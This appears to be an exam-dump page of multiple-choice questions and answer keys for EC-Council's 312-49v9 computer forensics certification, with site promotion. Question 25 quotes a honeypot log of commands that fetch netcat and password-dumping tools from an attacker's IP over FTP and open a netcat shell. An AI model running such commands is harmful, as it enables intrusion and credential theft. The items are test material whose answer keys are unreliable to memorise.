getcertified4sure.com

312-49v9 Exam

EC-Council 312-49v9 Vce 2021

Want to know Certleader 312-49v9 Exam practice test features? Want to learn more about the EC-Council ECCouncil Computer Hacking Forensic Investigator (V9) certification experience? Study tested EC-Council 312-49v9 answers to far out 312-49v9 questions at Certleader. Get success with an absolute guarantee to pass the EC-Council 312-49v9 (ECCouncil Computer Hacking Forensic Investigator (V9)) test on your first attempt.

NEW QUESTION 1

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

  • A. Only FTP traffic can be hijacked
  • B. Only an HTTPS session can be hijacked
  • C. HTTP protocol does not maintain session
  • D. Only DNS traffic can be hijacked

Answer: C

NEW QUESTION 2

Which response organization tracks hoaxes as well as viruses?

  • A. NIPC
  • B. FEDCIRC
  • C. CERT
  • D. CIAC

Answer: D

Explanation:
Note: CIAC (Computer Incident Advisory Capability) was run by the US Department of Energy.

NEW QUESTION 3

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

  • A. Security Administrator
  • B. Network Administrator
  • C. Director of Information Technology
  • D. Director of Administration

Answer: B

NEW QUESTION 4

When is it appropriate to use computer forensics?

  • A. If copyright and intellectual property theft/misuse has occurred
  • B. If employees do not care for their boss' management techniques
  • C. If sales drop off for no apparent reason for an extended period of time
  • D. If a financial institution is burglarized by robbers

Answer: A

NEW QUESTION 5

Which of the following commands shows you the NetBIOS name table?

  • A. nbtstat -n
  • B. nbtstat -c
  • C. nbtstat -r
  • D. nbtstat -s

Answer: A

NEW QUESTION 6

In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on "bringing down the Internet". Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves?

  • A. The change in the routing fabric to bypass the affected router
  • B. More RESET packets to the affected router to get it to power back up
  • C. STOP packets to all other routers warning of where the attack originated
  • D. RESTART packets to the affected router to get it to power back up

Answer: A

NEW QUESTION 7

The Windows Security Event Log contains records of login/logout activity and other security-related events specified by the system's audit policy. What does event ID 531 in the Windows Security Event Log indicate?

  • A. A user successfully logged on to a computer
  • B. The logon attempt was made with an unknown user name or a known user name with a bad password
  • C. An attempt was made to log on with the user account outside of the allowed time
  • D. A logon attempt was made using a disabled account

Answer: D

NEW QUESTION 8

Frank is working on a vulnerability assessment for a company on the West Coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. To what organization should Frank submit the log to find out whether it is a new vulnerability or not?

  • A. CVE
  • B. IANA
  • C. RIPE
  • D. APIPA

Answer: A

NEW QUESTION 9

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software?

  • A. Computer Forensics Tools and Validation Committee (CFTVC)
  • B. Association of Computer Forensics Software Manufacturers (ACFSM)
  • C. National Institute of Standards and Technology (NIST)
  • D. Society for Valid Forensics Tools and Testing (SVFTT)

Answer: C

NEW QUESTION 10

Why should you never power on a computer that you need to acquire digital evidence from?

  • A. When the computer boots up, files are written to the computer rendering the data "unclean"
  • B. When the computer boots up, the system cache is cleared which could destroy evidence
  • C. When the computer boots up, data in the memory buffer is cleared which could destroy evidence
  • D. Powering on a computer has no effect when needing to acquire digital evidence from it

Answer: A

NEW QUESTION 11

When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?

  • A. Write-blocker
  • B. Protocol analyzer
  • C. Firewall
  • D. Disk editor

Answer: A

NEW QUESTION 12

Microsoft Security IDs are available in the Windows Registry Editor. The path to locate the IDs in Windows 7 is:

  • A. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
  • B. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList
  • C. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup
  • D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule

Answer: A

NEW QUESTION 13

Corporate investigations are typically easier than public investigations because:

  • A. the users have standard corporate equipment and software
  • B. the investigator does not have to get a warrant
  • C. the investigator has to get a warrant
  • D. the users can load whatever they want on their machines

Answer: B

NEW QUESTION 14

From the following spam mail header, identify the host IP that sent this spam.

From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: <200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk>
From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE
Date: Tue, 27 Nov 2001 17:25:58 +0800
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
Reply-To: "china hotel web"

  • A. 137.189.96.52
  • B. 8.12.1.0
  • C. 203.218.39.20
  • D. 203.218.39.50

Answer: C

NEW QUESTION 15

What is the first step that needs to be carried out to investigate wireless attacks?

  • A. Obtain a search warrant
  • B. Identify wireless devices at crime scene
  • C. Document the scene and maintain a chain of custody
  • D. Detect the wireless connections

Answer: A

NEW QUESTION 16

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?

  • A. The registry
  • B. The swapfile
  • C. The recycle bin
  • D. The metadata

Answer: B

NEW QUESTION 17

Which one of the following is not a consideration in a forensic readiness planning checklist?

  • A. Define the business states that need digital evidence
  • B. Identify the potential evidence available
  • C. Decide the procedure for securely collecting the evidence that meets the requirement in a forensically sound manner
  • D. Take permission from all employees of the organization

Answer: D

NEW QUESTION 18

This is the file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.

  • A. Master Boot Record (MBR)
  • B. Master File Table (MFT)
  • C. File Allocation Table (FAT)
  • D. Disk Operating System (DOS)

Answer: C

Explanation:
An MBR is usually found on fixed disks, not floppies. An MFT is part of NTFS, and NTFS is not used on floppies. DOS is an operating system, not a file structure database.

NEW QUESTION 19

File deletion is a way of removing a file from a computer's file system. What happens when a file is deleted in Windows 7?

  • A. The last letter of a file name is replaced by a hex byte code E5h
  • B. The operating system marks the file's name in the MFT with a special character that indicates that the file has been deleted
  • C. Corresponding clusters in FAT are marked as used
  • D. The computer looks at the clusters occupied by that file and does not make that space available to store a new file

Answer: B

NEW QUESTION 20

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

  • A. Key escrow
  • B. Steganography
  • C. Rootkit
  • D. Offset

Answer: B

NEW QUESTION 21

What is the smallest allocation unit of a hard disk?

  • A. Cluster
  • B. Spinning tracks
  • C. Disk platters
  • D. Slack space

Answer: A

NEW QUESTION 22

Jones had been trying to penetrate a remote production system for the past two weeks. This time, however, he is able to get into the system. He was able to use the system for a period of three weeks. However, law enforcement agencies were recording his every activity, and this was later presented as evidence. The organization had used a virtual environment to trap Jones. What is a virtual environment?

  • A. A system using Trojaned commands
  • B. A honeypot that traps hackers
  • C. An environment set up after the user logs in
  • D. An environment set up before a user logs in

Answer: B

NEW QUESTION 23

What file structure database would you expect to find on floppy disks?

  • A. NTFS
  • B. FAT32
  • C. FAT16
  • D. FAT12

Answer: D

Explanation:
NTFS is not designed for removable media; although it is used on some very large removable media, it is never used on floppy disks.
FAT32 has a minimum space requirement that is larger than a floppy disk. FAT16 would seem like a logical choice, but is not usually used on floppies. FAT12 would be on floppy disks, and probably not seen on anything else. Since floppy disk media is small in size (less than 2 MB), a FAT12 file system has lower overhead and is more efficient.

NEW QUESTION 24

Which of the following statements is not correct when dealing with a powered-on computer at the crime scene?

  • A. If a computer is switched on and the screen is viewable, record the programs running on screen and photograph the screen
  • B. If a computer is on and the monitor shows some picture or screen saver, move the mouse slowly without depressing any mouse button and take a photograph of the screen and record the information displayed
  • C. If a monitor is powered on and the display is blank, move the mouse slowly without depressing any mouse button and take a photograph
  • D. If the computer is switched off, power on the computer to take a screenshot of the desktop

Answer: D

NEW QUESTION 25

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

  • A. It is a local exploit where the attacker logs in using username johna2k
  • B. There are two attackers on the system – johna2k and haxedj00
  • C. The attack is a remote exploit and the hacker downloads three files
  • D. The attacker is unsuccessful in spawning a shell as he has specified a high-end UDP port

Answer: C

Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

NEW QUESTION 26

Which of the following statements does not support the case assessment?

  • A. Review the case investigator's request for service
  • B. Identify the legal authority for the forensic examination request
  • C. Do not document the chain of custody
  • D. Discuss whether other forensic processes need to be performed on the evidence

Answer: C

NEW QUESTION 27
......

P.S. Easily pass the 312-49v9 Exam with 209 Q&As from Passcertsure Dumps & PDF Version. Welcome to download the newest Passcertsure 312-49v9 Dumps: https://www.passcertsure.com/312-49v9-test/ (209 New Questions)